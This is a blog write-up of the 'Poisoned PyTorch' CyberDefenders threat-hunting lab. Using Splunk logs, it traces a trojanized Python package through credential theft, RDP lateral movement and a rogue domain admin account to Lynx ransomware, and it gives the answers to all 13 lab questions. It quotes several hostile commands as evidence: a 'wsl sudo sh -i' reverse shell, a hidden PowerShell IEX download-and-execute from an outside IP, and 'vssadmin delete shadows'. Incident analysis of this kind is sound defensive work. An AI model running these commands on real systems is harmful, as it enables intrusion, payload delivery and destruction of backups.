Post

Incident Investigation Report: Poisoned PyTorch — Supply-Chain Compromise to Lynx Ransomware

Posted Updated
By El OMARI Zakaria
8 min read
Incident Investigation Report: Poisoned PyTorch — Supply-Chain Compromise to Lynx Ransomware

Platform: CyberDefenders Challenge: Poisoned PyTorch Category: Threat Hunting Difficulty: Medium Tools: Splunk, CyberChef, IDA, PEStudio, VirusTotal Achievement: Proof of Completion

1. Executive Summary

Incident Type: Software Supply-Chain Compromise / Domain-Wide Ransomware Deployment

Malware Family: Lynx (INC Ransomware variant)

On February 2, 2026, a developer at Unucorb executed a model training script in Visual Studio Code. Unknown to the user, a trojanized third-party Python package had been tampered with as part of a software supply-chain attack. The compromised package established a reverse shell via Windows Subsystem for Linux (WSL) to minimize Windows-native logging footprint.

Over the following hours, the attacker harvested domain administrator credentials from a deployment Unattend.xml file, used RDP to pivot laterally to the Domain Controller, created a rogue domain admin account (welsam), destroyed all VSS backup shadows, and ultimately deployed Lynx ransomware — a variant of the leaked INC Ransomware source code — across domain infrastructure.

CyberDefenders Poisoned PyTorch Lab overview page showing category Threat Hunting, difficulty Medium, rating 4.7 stars, and tools Splunk, CyberChef, IDA, PEStudio.

Indicators of Compromise (IOCs)

TypeIndicatorDescription
Initial Access MethodTrojanized Python Package (Supply Chain)PyPI dependency tampering
WSL Reverse Shell Commandwsl sudo sh -iExecution via WSL to evade Windows logging
Credential SourceUnattend.xmlPlaintext domain.admin password at 02:02:39 UTC
Lateral Movement ProtocolRDP (LogonType=10)domain.admin from anomalous IP 10.10.6.81
Rogue Account CreatedwelsamAt 03:15:18 UTC on DC01
Rogue Account GroupsDomain Admins, RDP UsersFull domain control granted
RDP to File Server2026-02-02 04:17:07 UTCFILE-SERVER-01 accessed
Fileless Downloadhttp://54.93.78.216/bPowerShell IEX download-and-execute at 04:37:54 UTC
Backup Destructionvssadmin.exe delete shadows /for=C: /quietVSS shadows destroyed on BACKUP-SERVER-01
Ransomware PathC:\Users\domain.admin\Documents\system recovery.exeDisguised ransomware binary
Ransomware SHA-256EAA0E773EB593B0046452F420B6DB8A47178C09E6DB0FA68F6A2D42C3F48E3BCLynx payload hash
Ransomware FamilyLynx (INC Ransomware variant)Confirmed via VirusTotal attribution
Cryptographic DLLcrypt32.dllWindows crypto library used for file encryption
Victim ID66a204aee7861ae72f21b4e0Unique victim tracking ID in ransom note
Attacker Contactmartina.lestariid1898@proton.meProtonMail for ransom negotiation

MITRE ATT&CK Mapping Overview

TacticTechniqueID
Initial AccessSupply Chain Compromise — Python PackageT1195.001
ExecutionWSL for Windows Log EvasionT1202
Credential AccessCredentials in Unattend.xmlT1552.001
Lateral MovementRemote Desktop Protocol (RDP)T1021.001
PersistenceCreate Domain Account (welsam)T1136.002
Privilege EscalationAccount Manipulation — Domain AdminsT1098.001
Defense EvasionDelete VSS Shadow CopiesT1490
ExecutionPowerShell IEX — Fileless PayloadT1059.001
ImpactData Encrypted for Impact — LynxT1486

2. Phase 1: Initial Access — Supply Chain via WSL (Question 1)

Objective: Identify the mechanism used to establish the initial reverse shell connection from the compromised developer workstation.

Querying Splunk for process creation events on the initial patient-zero workstation (PC01) surfaces an anomalous command: wsl sudo sh -i executed by the Python interpreter immediately after the model training script was run.

Splunk process creation event showing wsl sudo sh -i being executed by a Python child process, establishing a WSL-based reverse shell that bypasses Windows host-level network logging.

By routing the reverse shell through Windows Subsystem for Linux, the attacker effectively bypassed Windows-native network connection logging. The WSL network stack operates independently of Windows’ netsh and iphlpapi monitoring surfaces — meaning the C2 connection never appeared in standard Windows security event logs or Sysmon Event ID 3 (Network Connect) entries.

Analyst Note: WSL is an increasingly popular attacker tool for evasion specifically because many EDR solutions and Windows logging mechanisms have incomplete visibility into Linux-side activity. If WSL is not required for business operations, disable it via Group Policy: Computer Configuration > Administrative Templates > Windows Components > Windows Subsystem for Linux.

Answer Q1

What was the initial reverse shell execution method used by the trojanized package?

wsl sudo sh -i

3. Phase 2: Credential Access — Unattend.xml (Question 2)

Objective: Identify the timestamp when the attacker accessed the credential-containing deployment file.

Splunk’s Sysmon Event ID 11 (File Accessed) query reveals that the file Unattend.xml was accessed at a precise timestamp. Unattend.xml is a Windows deployment answer file used by IT teams to automate operating system installation — it frequently contains hardcoded administrator passwords that are never cleaned up post-deployment.

Splunk Sysmon Event ID 11 showing the Unattend.xml file access at 02:02:39 UTC, confirming the attacker read the deployment file containing the domain.admin plaintext password.

Answer Q2

At what time did the attacker access the credential-containing file?

02:02:39

4. Phase 3: Lateral Movement — RDP to Domain Controller (Question 3)

Objective: Identify the protocol used for lateral movement from the compromised workstation to the Domain Controller.

With domain.admin credentials in hand, the attacker initiated an RDP session to DC01. Querying Splunk for Windows Event ID 4624 (Successful Logon) with LogonType = 10 (Remote Interactive / RDP) on DC01 reveals the session, originating from an anomalous internal IP (10.10.6.81) — indicating the attacker routed the RDP session through a proxy or port-forwarded it via the WSL tunnel.

Splunk query showing Windows Security Event 4624 LogonType 10 on DC01 with domain.admin credentials logging in from the anomalous source IP 10.10.6.81.

Answer Q3

What protocol was used for lateral movement to the Domain Controller?

RDP

5. Phase 4: Persistence — Rogue Domain Admin Account (Questions 4 & 5)

Objective: Identify the rogue account created on the Domain Controller and the groups it was added to.

On the Domain Controller, the attacker created a backdoor domain administrator account. Querying Splunk for Event ID 4720 (User Account Created) reveals the account name and creation timestamp:

Splunk Event ID 4720 showing the creation of rogue account welsam on DC01 at 03:15:18 UTC by the compromised domain.admin account.

Within seconds, the account was added to the Domain Admins group (Event ID 4728) and then the RDP Users group (Event ID 4728 again), granting full domain control and remote access capability:

Splunk Event ID 4728 showing welsam being added to the Domain Admins security group at 03:15:31 UTC — 13 seconds after account creation.

Answer Q4

What is the name of the rogue account created on the Domain Controller?

welsam

Answer Q5

What group was the rogue account added to first?

Domain Admins

6. Phase 5: Pre-Ransomware Preparation (Questions 6 & 7)

Objective: Identify the file server access timestamp and the fileless payload download used before ransomware execution.

The attacker moved laterally again, this time to the file server. The Splunk query for logon events on FILE-SERVER-01 reveals the precise access time:

Splunk Event ID 4624 LogonType 10 showing the attacker's RDP session on FILE-SERVER-01 at exactly 04:17:07 UTC.

Shortly after, a fileless PowerShell download was executed — a classic living-off-the-land technique that downloads and executes a payload directly in memory without writing to disk:

Splunk Sysmon Event ID 1 showing powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://54.93.78.216/b'))" executed at 04:37:54 UTC.

Analyst Note: IEX (Invoke-Expression) with downloadstring is one of the most common fileless payload delivery mechanisms. The -nop (NoProfile) and -w hidden (WindowStyle Hidden) flags are deliberate evasion choices. Any PowerShell command matching IEX *downloadstring* should generate an immediate critical alert in your SIEM.

Answer Q6

At what time did the attacker access the file server?

04:17:07

Answer Q7

What URI was used for the fileless PowerShell payload download?

/b (from http://54.93.78.216/b)

7. Phase 6: Defense Evasion — Backup Destruction (Question 8)

Objective: Identify the tool used to destroy VSS shadow copies on the backup server.

Before executing the ransomware, the attacker moved to the backup server and destroyed all Volume Shadow Copies — the primary native recovery mechanism in Windows environments. This ensures victims cannot recover files without paying the ransom:

Splunk Sysmon Event ID 1 showing vssadmin.exe delete shadowsfor=C:quiet executed on BACKUP-SERVER-01 at 04:14:02 UTC, destroying all volume shadow copies before ransomware deployment.

Answer Q8

What tool was used to destroy the VSS shadow copies?

vssadmin.exe

8. Phase 7: Ransomware Identification & Attribution (Questions 9–13)

Objective: Identify the ransomware binary’s location, hash, family, cryptographic library, and predecessor malware family.

The ransomware binary was discovered in the domain.admin Documents folder, disguised with the plausible name system recovery.exe:

Raw Splunk artifact showing the path C:\Users\domain.admin\Documents\system recovery.exe for the Lynx ransomware binary disguised as a system utility.

Its SHA-256 hash was extracted via Splunk’s Sysmon Event ID 7 (Image Loaded) query:

Splunk Sysmon Event ID 7 showing the SHA-256 hash EAA0E773EB593B0046452F420B6DB8A47178C09E6DB0FA68F6A2D42C3F48E3BC of system recovery.exe.

Querying this hash on VirusTotal returned universal attribution to Lynx ransomware. Import table analysis revealed crypt32.dll as the primary Windows cryptographic library dependency:

VirusTotal detection results showing the system recovery.exe SHA-256 hash universally attributed to Lynx ransomware across multiple detection engines.

VirusTotal import table analysis showing crypt32.dll as the primary cryptographic API dependency of the Lynx ransomware binary, used for AES key generation and file encryption.

Threat intelligence reports confirm Lynx shares substantial code similarity with INC Ransomware — consistent with the leaked INC source code being recompiled under a new brand:

VirusTotal and threat intelligence reports showing code similarity analysis between Lynx and INC Ransomware, confirming Lynx is a rebrand of the leaked INC Ransomware source code.

The ransom note (README.txt) found on affected systems contained a unique victim tracking ID and the attacker’s ProtonMail contact:

Ransom note from the Lynx ransomware deployment showing the unique victim ID 66a204aee7861ae72f21b4e0 and ProtonMail contact martina.lestariid1898@proton.me for negotiation.

Answer Q9

What is the full path of the ransomware binary?

C:\Users\domain.admin\Documents\system recovery.exe

Answer Q10

What is the SHA-256 hash of the ransomware?

EAA0E773EB593B0046452F420B6DB8A47178C09E6DB0FA68F6A2D42C3F48E3BC

Answer Q11

What is the ransomware family?

Lynx

Answer Q12

What cryptographic DLL does the ransomware use?

crypt32.dll

Answer Q13

What malware family is Lynx a variant of?

INC Ransomware

9. Conclusion

The Poisoned PyTorch investigation reconstructs a sophisticated attack chain that began with a tampered Python package and ended in domain-wide ransomware. Key findings:

  1. Supply Chain: A trojanized PyPI package executed wsl sudo sh -i, exploiting WSL to bypass Windows network logging.
  2. Credential Theft: Unattend.xml deployment file contained plaintext domain.admin password — a common post-deployment cleanup failure.
  3. Domain Compromise: RDP to DC01 → Created welsam as a backdoor domain admin in under 30 seconds.
  4. Backup Destruction: vssadmin.exe delete shadows on the backup server prevented native recovery.
  5. Ransomware: Lynx (INC Ransomware rebrand) deployed as system recovery.exe — with crypt32.dll for encryption.

Key Takeaways for the SOC:

  1. PyPI packages are not safe by default. Implement dependency scanning (pip-audit, Sonatype Nexus IQ) and pin package versions with SHA-256 hash verification in your ML/data science workflows.
  2. Unattend.xml files are persistent credential risks. Run a scheduled audit to detect and delete these files across your fleet. They are among the most commonly overlooked credential exposure vectors.
  3. WSL is a blind spot for many EDR solutions. If your business does not require WSL, disable it via GPO. If it is required, ensure you have Linux-side logging visibility in your SIEM.
  4. Backup servers must be network-isolated. If a compromised domain admin can RDP to your backup server and run vssadmin, your backup strategy is insufficient. Implement immutable backups or air-gapped offline copies.
  5. IEX *downloadstring* = Immediate alert. This PowerShell pattern should never appear in a production environment. It is almost exclusively used for fileless malware delivery.

Analysis Date: April 12, 2026 Analyst: El OMARI Zakaria

CTF Write-ups, Threat Hunting, Incident Response
cyberdefenders ransomware lynx splunk supply-chain wsl lateral-movement vssadmin inc-ransomware siem threat-hunting active-directory rdp unattend-xml
This post is licensed under CC BY 4.0 by the author.